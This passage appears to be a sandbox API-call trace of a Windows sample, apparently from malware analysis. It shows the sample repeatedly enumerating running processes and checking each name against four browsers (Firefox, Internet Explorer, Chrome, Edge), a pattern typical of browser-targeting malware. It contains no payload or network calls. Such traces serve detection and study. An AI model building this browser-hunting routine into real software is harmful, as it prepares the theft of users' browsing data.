lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0190.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0190.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0190.830] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.830] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.830] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.830] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.830] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.830] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.831] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.831] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.831] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.831] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.831] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0190.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0190.831] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0190.832] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.832] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0190.832] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0190.832] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0190.832] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.832] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.833] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.833] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0190.834] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.834] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0190.835] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0190.835] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0190.835] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0190.835] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0190.835] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0190.836] CloseHandle (hObject=0xd4) returned 1 [0190.836] Sleep (dwMilliseconds=0x3e8) [0192.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0192.032] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.033] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0192.033] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0192.033] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0192.033] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0192.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.033] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0192.033] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0192.033] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0192.033] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0192.033] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.034] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0192.034] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0192.034] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0192.034] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.034] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.034] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0192.034] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0192.034] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0192.034] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.035] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.035] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0192.035] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0192.035] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0192.035] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.035] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.036] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0192.036] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0192.036] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0192.036] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.036] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.036] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0192.036] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0192.036] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0192.036] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.036] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.037] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0192.037] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0192.037] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0192.037] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.037] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0192.037] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0192.037] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0192.037] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.037] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0192.038] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0192.038] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0192.038] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0192.038] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.038] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.038] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.038] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.039] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.039] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.039] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.040] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.040] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.040] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.041] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.041] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.041] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.041] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.041] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.041] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0192.041] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0192.041] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0192.041] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.041] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.042] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.042] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.042] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.042] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.042] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.043] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.043] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.043] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.043] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.043] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.043] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0192.043] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0192.043] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0192.043] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.043] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.044] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0192.044] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0192.044] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0192.044] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.044] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.044] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0192.044] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0192.044] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0192.044] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.044] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.045] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0192.045] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0192.045] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0192.045] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.045] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.045] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0192.045] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0192.045] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0192.045] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.045] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0192.046] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0192.046] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0192.046] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0192.046] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.046] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0192.047] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0192.047] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0192.047] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0192.047] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.047] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0192.047] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0192.047] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0192.047] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0192.047] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.047] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0192.048] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0192.048] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0192.048] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0192.048] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.048] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0192.048] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0192.048] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0192.048] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0192.049] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0192.049] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0192.049] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0192.049] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0192.049] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0192.049] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.049] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0192.050] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0192.050] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0192.050] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0192.050] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0192.050] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, 